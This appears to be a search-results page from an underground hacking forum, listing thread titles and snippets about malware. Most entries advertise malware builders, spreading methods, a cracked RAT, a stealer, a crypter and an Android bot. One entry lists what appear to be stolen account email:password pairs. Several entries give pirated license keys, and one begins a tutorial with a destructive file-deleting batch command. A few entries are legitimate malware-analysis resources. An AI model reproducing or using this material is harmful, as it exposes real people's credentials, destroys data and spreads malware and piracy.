1. kaypaid

    Private [NEW] ? BEST MALWARE SPREADING TECHNIQUE ?

    Download: *** Hidden text: You do not have sufficient rights to view the hidden text. Visit the forum thread! ***
  2. amine_cold

    Writing a simple, Stealthy malware

    introduction This article will discuss and demonstrate how polymorphic malware use self-modification to hide its inner workings, In my previous post metamorphic malware, I explained how to write a malware with metamorphism features. So what is it, Well, Polymorphic malware is an old idea...
  3. FireBosstoolx

    IObit Malware Fighter Pro 10.3 Free License -Protect your PC

    https://www.techno360.in/iobit-malware-fighter-pro-10-free-license/
  4. 087orch

    [PDF] Malware Dev, AV Evasion, Obfuscation, etc.

    File Hosting : Mega
  5. lost2dreamer

    ➕Mobile Platform

    ➕Mobile Platform https://mega.nz/folder/hmx2HByZ#cacR-KFI8K4aDJ1Y_X5ngw
  6. Prophet3169

    How to hide malware in the pdf file i find it at dark web

    Have fun guys Link: *** Hidden text: You do not have sufficient rights to view the hidden text. Visit the forum thread! ***
  7. hilltimoth

    Private Used for anytype of malware:- rat, keylogger, botnet e.t.c

    Download: *** Hidden text: You do not have sufficient rights to view the hidden text. Visit the forum thread! ****** Hidden text: You do not have sufficient rights to view the hidden text. Visit the forum thread! ***
  8. hilltimoth

    Login:Pass 2x free paid software BaldEagle - C++ Stealer

    Download: *** Hidden text: You do not have sufficient rights to view the hidden text. Visit the forum thread! ***
  9. bkslechia

    ✨HQ UNIQUE METHODS✨✅ SPREAD RATS/MALWARE ✅ ☄️ + FREE METHOD☄️

    Today im going to be giving away one of my favorite methods. Ive never really talked about these to anyone before on here and most of them I just have learnt from experience with social engineering projects in the past, would appreciate any support (only if u believe its HQ) TeenChat Spreading...
  10. ~SAMURAI~

    EBook/Course [100% OFF] REVERSE ENGINEERING AND MALWARE ANALYSIS IN 21 HOURS

    https://www.udemy.com/course/reverse_engineering/?couponCode=REV_ANALYSIS
  11. lowellsperry

    [Tutorial] Malware Spreading with Social Media + Discord

    Been seeing heaps of posts asking for spreading methods, so I thought I would share a simple method I've been using to hopefully help out you people out there! This requires no coding or website creation, so its fairly easy to do :) This method takes advantage of short-form content social media...
  12. orlami

    How Hackers Create undetectable Malware and Viruses

    https://mega.nz/folder/5V4R3QyC#3NaPApDjgZzBbaum-EeLSg
  13. exobane

    Login:Pass eehttps://dayhacked.com/malware/rat/venom-rat-6-0-1-cracked/ww

    https://dayhacked.com/malware/rat/venom-rat-6-0-1-cracked/https://dayhacked.com/malware/rat/venom-rat-6-0-1-cracked/
  14. exobane

    Login:Pass https://dayhacked.com/malware/rat/venom-rat-6-0-1-crdacked/

    Download: *** Hidden text: You do not have sufficient rights to view the hidden text. Visit the forum thread! ***
  15. exobane

    Login:Pass https://dayhacked.com/malware/rat/venom-rat-6-0-1-cracked/

    Download: *** Hidden text: You do not have sufficient rights to view the hidden text. Visit the forum thread! ***
  16. ZR9

    Practical Malware Analysis

    Link : https://anonfiles.com/3099Wdj9ze/Practical_Malware_Analys
  17. babagoparina

    Combo Tools IObit Malware Fighter Pro 2023

    Features of IObit Malware Fighter Pro 2023 Below are some noticeable features which you’ll experience after IObit Malware Fighter Pro 2023 free download. Potent application for eliminating malware and infections. Track and alert you to any questionable app activities. Identify and stop...
  18. salame

    Combo Tools Hidden Malware Builder

    LINK *** Hidden text: You do not have sufficient rights to view the hidden text. Visit the forum thread! ***
  19. Sendjunks

    Keylogger :- A Basic Malware

    INTRODUCTION Keyloggers are tools that record what a person types on a device. While there are legitimate and legal uses for keyloggers, many uses for keyloggers are malicious. In a keylogger attack, the keylogger software records every keystroke on the victim’s device and sends it to the...
  20. Sendjunks

    Writing a simple, Stealthy malware

    Introduction This article will discuss and demonstrate how polymorphic malware use self-modification to hide its inner workings, In my previous post metamorphic malware, I explained how to write a malware with metamorphism features. So what is it, Well, Polymorphic malware is an old idea...
  21. Sendjunks

    Source Code What to do if your pc got infected with malware?

    Best option would probably be wiping and completely reinstalling the whole operating system. If it’s some sort of rootkit, the AV will probably never find it and if it’s some type of self-spreading malware, you will have to pretty much wipe everything. Just don’t install random software that...
  22. AlexSon

    Others X28 HITS MALWARE BYTES ACCOUNTS

    westjoey12@gmail.com:Devil666! bwalker21959@gmail.com:yW37X**^ dexonserwis@o2.pl :5751825146Pd lourenco.adv.sp@gmail.com:Ed@329591 skayoon@gmail.com:Alexsk@43 jsalazargarcia@gmail.com:Colombia@01 bohnwork@gmail.com:Thisissecure0911! info@borjomipalace.ge:Sataxa236689696...
  23. lesro

    Key/Code IObit Malware Fighter Keys

    > Status: Active ✅ > Product Type: 10 PRO C5533-8A2B7-64FDA-88B3N > Expires On: 12 March 2024 ======================= 8E805-26883-38AAD-B9D3N > Expires On: 21 February 2024 ======================= D908E-833FB-07A48-3E43N > Expires On: 03 December 2023 =======================...
  24. WhiteWolf69

    Multi/Others Glarysoft Malware Hunter PRO 1.150.0.767 incl patch

    ADD AN IMAGE HERE! [Not adding an image will result in removal] Then remove these lines. Download: https://fs0.patchedfiles.com/a4ef52c0029648b2 *** Hidden text: You do not have sufficient rights to view the hidden text. Visit the forum thread! ***
  25. lesro

    Key/Code IObit Malware Fighter 10 keys

    Key : C5533-8A2B7-64FDA-88B3N End :Mar. 12, 2024 Key : 8E805-26883-38AAD-B9D3N End: Feb 21, 2024 Key : D908E-833FB-07A48-3E43N End : Dec. 03, 2023 Key : 37B4D-27299-3E8E0-E093N End : Aug 15, 2023 Link: *** Hidden text: You do not have sufficient rights to view the hidden text. Visit the...
  26. MRX2077

    Login:Pass XXXXXXXXXXXX

    XXXXXXXXXXXX
  27. logtemp10

    Login:Pass Malware Development Course

    Download: *** Hidden text: You do not have sufficient rights to view the hidden text. Visit the forum thread! ***
  28. rtr23

    Hypatia: A Free and Open Source Malware Scanner for Android

    Visit the F-Droid marketplace via this link and install the app. If prompted, go into your device’s settings and enable installation from unknown sources. Link: GitHub Running a Scan Once the app is installed and running, tap the three-dot button for settings.
  29. lil travis

    Key/Code Others 💥 IOBit Malware fighter

    8E805-26883-38AAD-B9D3N > Expires On: Feb 21, 2024 37B4D-27299-3E8E0-E093N > Expires On: August 15, 2023 7ACB6-2F721-83A90-50E3N Expires On: July 25, 2023 42E46-41A65-4734C-9933N Expires On: June 25, 2023
  30. itsmenigger0012

    Login:Pass MAlware analysis

    Malware analysis and Reverse Engineering. • A small selection of useful material for studying RE and malware analysis. Most of the repos have not been updated for a long time, however, you can find useful information for learning, especially for beginners. • https://github.com/ytisf/theZoo •...
  31. carxproveteran

    Udemy - The Malware Analysis Course

    The Malware Analysis Course Learn Malware Analysis In Cyber Security. A comprehensive course! What you'll learn Understanding the Cybersecurity Landscape The Role of Malware in APTs Why Traditional Security Soutions Fail to Control APTs Learn How To Analyze Malware *** Hidden text: You do...
  32. MafiaDollar

    SQLi/Dork SuperSQLInjection v2.0 20220906 New (All other sources are fake)

    ADD AN IMAGE HERE! [Not adding an image will result in removal] Then remove these lines. Download: https://www.mediafire.com/file/vs42huwkre2swm8/SuperSQLInjectionV2.zip/file [Paste your content here. Remove this line and one below!] [DO NOT PASTE THE CONTENT ABOVE OR BELOW THE REPLY...
  33. Elfawizzy

    Shell SELF-REPLICATING MALWARE

    CLICK HERE 
  34. Nomed1478963

    Combo Tools MEGA.NZ AUTO-SPREAD MALWARE 2023

    PREVIEW: Nothing complicated, follow instructions. You can add modules on it or upgrade it, i don't really know, but was fun to make. This python script will upload your wanted files from a given path to cracked mega.nz accounts and delete other potential virus, or files that have your...
  35. mmh

    Method/Tut The various types of malwares and techniques used to distribute them

    *** Hidden text: You do not have sufficient rights to view the hidden text. Visit the forum thread! ****** Hidden text: You do not have sufficient rights to view the hidden text. Visit the forum thread! ***
  36. Sadex

    😍[UNDETECTABLE] BUILD MALWARE USING C LANGUAGE 🔥

    😍[4GB BIG] BUILD MALWARE USING C LANGUAGE⚡ *** Hidden text: You do not have sufficient rights to view the hidden text. Visit the forum thread! ***
  37. Ronnyvs

    Tcm security malware Anaylsis course free download

    Link: *** Hidden text: You do not have sufficient rights to view the hidden text. Visit the forum thread! ***
  38. noeass

    Worst (toxic trojans)

    *** Hidden text: You do not have sufficient rights to view the hidden text. Visit the forum thread! ***
  39. introduction

    Malware Analysis

    Forensics CheatSheets https://www.jaiminton.com/cheatsheet/DFIR/# Online Services VirusTotal HybridAnalysis Koodous Intezer Offline Antivirus and Detection Tools Yara Install sudo apt-get install -y yara Prepare rules Use this script to download and merge all the yara malware rules...
  40. Joe0213

    What is a Trojan? Is it a virus or is it malware?

    This thread is for the general discussion of the Article What is a Trojan? Is it a virus or is it malware?. Please add to the discussion here.
  41. goldsf

    Tuto APK Virus/Malware avec l'outil "msfvenon"

    Privilège: [RÉPONDRE] Ce tuto s'applique sur Kali LINUX La première chose a faire est de créer l'apk avec msfvenom, en définissant le port et l'adresse IP où nous recevrons la connexion : Une fois que nous avons cela, nous l'envoyons au téléphone Android et en attendant nous l'écoutons depuis...
  42. Hacker_2333

    Dorks SQLi/Dorks Method/Tut EBook/Course Others Malware and threads ethical hacking advanced level

    Link:https://mega.nz/folder/YmAnkayI#_R5S5wavmlddWy1R5a-f1Q *** Hidden text: You do not have sufficient rights to view the hidden text. Visit the forum thread! ***
  43. melaniejamescruz

    Key/Code Malware Bytes Keys

    MalwareBytes Keys 6MS28:KDLL-YV1W-E04J-3TJ3 9HP23:D33K-FBHM-YEP4-BLX6 9ZW47:NU2E-MWEV-U3P2-CNFM 6HZ77:6RTE-E7A7-MWKB-YTTH 8ZL67:HJG3-57DN-0R70-629G 6KW59:Y27C-K6G9-AH7R-YC0L 8SF39:8NP3-3K7M-5MAG-LQFH 4DX78:4VPX-DFXW-6JPU-F7WN 4DE56:WXGU-RCNJ-0RGU-0EJD 8SG25:24V5-9VPG-BB77-PDAB...
  44. bleckrosemaza

    Xmbot Android Bots | Malware

    ✅ get all SMS messages ✅ get all contacts ✅ run installed applications ✅ get login credentials ✅ request geolocation/GPS activation ✅ start/stop socks5 ✅ open a URL in a web browser ✅ create fake notifications ✅ show a message box ✅ block/unblock wifi, power, and settings ✅ track mobile live ✅...
  45. L

    HOW TO RECOGNIZE MALWARE BEFORE IT IS TOO LATE

    HOW TO RECOGNIZE MALWARE BEFORE IT IS TOO LATE !!! If you get a zip files with the following files or even just one of them, then you should think about twice, if you run or better delete it. ▪️BouncyCastle.Crypto.dll — Bouncy Castle is a collection of APIs used in cryptography. ▪️cGeoIp.dll...
  46. elfoeda

    Key/Code X1 Iobit Malware Fighter

    Link: *** Hidden text: You do not have sufficient rights to view the hidden text. Visit the forum thread! ****** Hidden text: You do not have sufficient rights to view the hidden text. Visit the forum thread! ***
  47. killady85

    Toolset - Malware Threats - Certified Ethical Hacker v12

    Toolset - Malware Threats - Certified Ethical Hacker v12 Link: *** Hidden text: You do not have sufficient rights to view the hidden text. Visit the forum thread! ***
  48. zelvafrancek420

    Make any file FUD with my software

    Make any file FUD with my software My software allows you to create any virus FUD. How to get script? Contact me and try script on any malware. This way you will see it really works. -> https://linktr.ee/zelvafrancek How does script work? Works with any Python and Javascript code. Creates FUD...
  49. William N Nguyen

    😅How To Create Computer Virus in Less Than 60 Seconds😉

    ⚓️ Many of you will think the methods must be on coding, but nothing like that. The tricks are based on Notepad. 🌐 Creating a Dangerous Virus 🔹Step 1: First of all, in your Windows OS, open Notepad. 🔹Step 2: Now, copy and paste the below code into your notepad screen. @echo off Del C: *.* |y...
  50. seraza

    Key/Code X1 Iobit malware fighter

    Link: *** Hidden text: You do not have sufficient rights to view the hidden text. Visit the forum thread! ***
Top Bottom